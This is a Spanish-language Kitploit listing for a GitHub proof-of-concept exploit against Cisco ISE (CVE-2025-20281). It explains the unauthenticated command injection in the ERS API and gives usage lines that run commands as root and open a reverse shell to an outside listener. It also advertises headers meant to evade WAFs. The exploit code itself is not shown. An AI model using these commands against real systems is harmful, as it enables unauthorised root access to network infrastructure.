Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Cisco-CVE-2025-20281-illdeed — Exploit de ejecución remota de código sin autenticación para CVE-2025-20281 en la API ERS de Cisco ISE. Ejecuta comandos o lanza shells inversas como root — no se requiere autenticación. | Kitploit
Herramientas/GitHubGitHub/ill-deed/cisco-cve-2025-20281-illdeed
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubill-deed/cisco-cve-2025-20281-illdeed

Cisco-CVE-2025-20281-illdeed

Exploit de ejecución remota de código sin autenticación para CVE-2025-20281 en la API ERS de Cisco ISE. Ejecuta comandos o lanza shells inversas como root — no se requiere autenticación.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
52hace 1 añoAún no revisado

CVE-2025-20281 — Exploit de RCE no autenticado en la API ERS de Cisco ISE

Este repositorio contiene un exploit de prueba de concepto en Python 3 para CVE-2025-20281, una vulnerabilidad crítica en Cisco Identity Services Engine (ISE) que permite ejecución remota de código (RCE) no autenticada como root a través de la API ERS.


🩻 Resumen de la vulnerabilidad

El endpoint /ers/sdk#_ de ERS de Cisco ISE no valida la autenticación al procesar solicitudes de creación de usuarios.
Al inyectar comandos de shell en el parámetro name del objeto InternalUser, los atacantes pueden lograr la ejecución de comandos como root.

  • ID de CVE: CVE-2025-20281
  • Afecta: Cisco ISE PAN (Policy Admin Node) con ERS habilitado
  • Gravedad: Crítica (CVSS 9.8)
  • Autenticación: No se requiere ninguna

⚙️ Características

  • ✅ Ejecutar comandos arbitrarios (--cmd)
  • ✅ Prueba rápida con --whoami
  • ✅ Lanzar reverse shells (--reverse)
  • ✅ No se requiere autenticación ni token de sesión
  • ✅ Supresión de advertencias SSL y salida limpia
  • ✅ Cabeceras legítimas para evadir WAFs simples

🚀 Uso

root@kitploit:~
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]

Ejemplos

Comando de prueba:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --whoami

Ejecutar comando personalizado:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"

Reverse shell:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444

⚠️ Aviso legal

Este código se proporciona únicamente con fines educativos y de pruebas autorizadas. No utilices este software contra redes o sistemas que no poseas o para los que no tengas permiso de pruebas.


🙏 Créditos

Vulnerabilidad: Divulgada a través del aviso de seguridad de Cisco

PoC Refactor: illdeed

Descargar herramienta